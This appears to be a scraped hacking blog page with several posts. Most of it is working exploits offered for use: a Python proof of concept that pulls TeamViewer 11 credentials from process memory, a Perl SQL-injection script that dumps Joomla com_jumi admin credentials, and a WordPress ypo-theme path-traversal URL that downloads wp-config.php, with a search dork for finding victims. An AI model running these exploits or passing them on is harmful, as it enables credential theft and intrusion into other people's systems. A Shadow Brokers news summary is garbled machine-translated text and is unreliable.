TeamViewer 11.0.65452 (64bit) Credential Disclosure



Hello friend in here is code exploit vulnerability Teamviewer 11.0.65452 (64bit) below

So I hope you enjoy with it and Exploit use this code !!!



##############################################
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####

from winappdbg import Debug, Process, HexDump
import sys
import re

filename = 'TeamViewer.exe'

def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.

# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]

print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')

found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'
if len(found) > 1:
s = list(set([x for x in found if found.count(x) > 1]))
for i in s:
pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]

return found

debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# For all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()

memory_search(pid)

finally:
debug.stop()

Download Driver Computer


Hi guy if you want to download your computer Driver please Note your Branch Computer, Model No or Service tag No and sent to me I will generate and sent link to you

We will sent link to you less than 1h!

Thank that visit us...

Autonomous drone hacking w/Raspberry Pi, aircrack & Javascript By Samy Kamkar

Autonomous drone hacking w/Raspberry Pi, aircrack & Javascript By Samy Kamkar




Hello Friend Today I wanna to share about Drone Hacking So if you are thinking your dream want to Drone Hacking now in my site have video don't think It's is fake but this Time Hacking is very awesome if you are ready Hacker you will knew about that so first I need show you about Hardware need to Drone Hacking

                      Hardware and Software used 

SkyJack: http://samy.pl/skyjack
Raspberry Pi: http://www.raspberrypi.org/
Parrot AR.Drone 2: http://ardrone2.parrot.com/
Aircrack-ng: http://www.aircrack-ng.org/
Node.js: http://nodejs.org/
node-ar-drone: https://github.com/felixge/node-ar-drone
Alfa AWUS036h wifi card: http://www.alfa.com.tw/products_show.php?pc=34&ps=92
Edimax EW-7811Un wifi card: http://www.edimax.com/edimax/global/


                                  Demo Video  





Note : For Education Only 


Thank for visit I hope see you soon...............

Joomla com_jumi SQL InjecTion Vulnerability

              Joomla com_jumi SQL InjecTion Vulnerability 




Hello everyone Today I wanna show you how to exploit website joomla vulnerability with sql injection script perl you can copy code and past on your notepad or ......
                       

                                          Demo Video !!





===========================================

 #!/usr/bin/perl -w

 ########################################
#[~] Author : MA Tochka Injector
#[!] exploit Name: Joomla com_jumi
########################################
print "tt \n\n";
print "tt MA Tochka Injector | Marocain Attacker \n\n";
print "tt \n\n";
print "tt Joomla com_jumi Remote SQL Injection Exploit \n\n";
use LWP::UserAgent;
print " Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
$dzmind="concat(username,0x3a,password)";
$sakkure="jos_users";
$com="com_jumi";
$cw="+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=".$com."&fileid=93&Itemid=117".$cw."1,".$dzmind.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Account : $1\n\n";
print "# Successfully Injected #\n\n";
}
else{print "\n[-] Exploit Failed :( \n";
}
==========================================

The NSA Real Hacked Confirmed By Snowden Documents

The NSA  Real Hacked  Confirmed By Snowden Documents

Snowden documents confirmed that the recent NSA hack was real. Interception links found new malware and exploits in documents provided by Snowden. The report mentions the existence of SECONDDATE, hacker programs, which affected millions of computers worldwide.

Last weekend, hacking group called the Shadow brokers claim to crack the group of equations, hacking group which is widely believed to NSA.
Shadow Brokers dumped some special tools and hacking exploits, demanding 1 million Bitcoin release all files. While security experts and analysts are looking for some solid connections NSA interception confirmed the same.
Intercept found links to leaked feats in gathering documents provided by Snowden NSA whistle blowers.

Here is an excerpt from the report:

"The evidence that links the Shadow Brokers blame for the NSA comes to the agency guidance to implant malicious programs are classified top secret, provided by Snowden, and have not previously available to the public. The draft guidance directs NSA operators to control their use of the same program with the help of malicious programs specific string of 16 characters, "ace02468bdf13579." This is exactly the same string that appears in Shadow Brokers leak in the code associated with the same program, SECONDDATE ".

After this diversion, many security experts have expressed concern about the risk in half. First, hackers stole these funds could use them. Secondly, the common criminals now use against a variety of purposes.

Hacking tools leaked out and put up for action Shadow Brokers wide range of programs that can be used to penetrate the computer systems all over the world in a secret manner.

On the other hand, Snowden suspects that some competitor NSA responsible for these leaks. He also says that NSA servers malware posing getting hacked is not new, but the public display of the same

.

Exploit Theme ypo-theme Vulnerabiliy Wordpress Site

        Exploit Theme ypo-theme Vulnerabiliy Wordpress

Hello everyone Today I wanna show you New Exploit Theme Wordpress Vulnerability

so you know ready about how to use it to Exploit and but for newbie you check my video Basic Exploit

in my Tutorial you should subcribe my channel youtube and Like my Page get more Vulnerability CMS Wordpress , Joomla , Drupal more .....

##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################

                    Video Demo Exploit Theme ypo-theme




Content us : Here  

Thank for visit I hope see you soon...............

How to Turn off windows Autoplay from all Drive

Disable this feature to safe open all drive
 
Method 1: Disable using Control Panel
Open Control Panel\All Control Panel Items\AutoPlay and untick this option and save.

Method 2: Disable Autoplay using gpedit.msc
press Winkey + R to open run box and type gpedit.msc click OK
Go to Computer Configuration-> Administrative Templates-. Windows Components -> Autoplay Policies


Look at the right panel double click on Turn off AutoPlay and choose Enabled for Options: choose All drives and Click OK.
 Method 3: Disable using regedit
press Winkey + R to open run box and type regedit click OK
Goto:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer




 Look at right and double click on NoDriveTypeAutoRun (if you don't see create it) and set value data hexadecimal value 000000ff (Decimal 255).

                                                                                Thank for Your Reading.


Tool - Grab The CMS (Content Management System)

Tool - Grab The CMS (Content Management System)





 Hello Guy ! Today I wanna show you Grab The CMS (Content Management System) and Perl
 So I hope you guy enjoy with my website I will try free something.... and Knowledge about Hacking is not Crime Let's go !!! 

                                          

                           Video Demo Exploit

                         Don't forget subcribe my channel get more Tutorial                      




Now you Download Tool : Here

Password Winrar : dedsectool 

I hope you agree my english skilll !!

Content us : Here  

Thank for visit I hope see you soon...............

 
Subscribe to: Posts (Atom)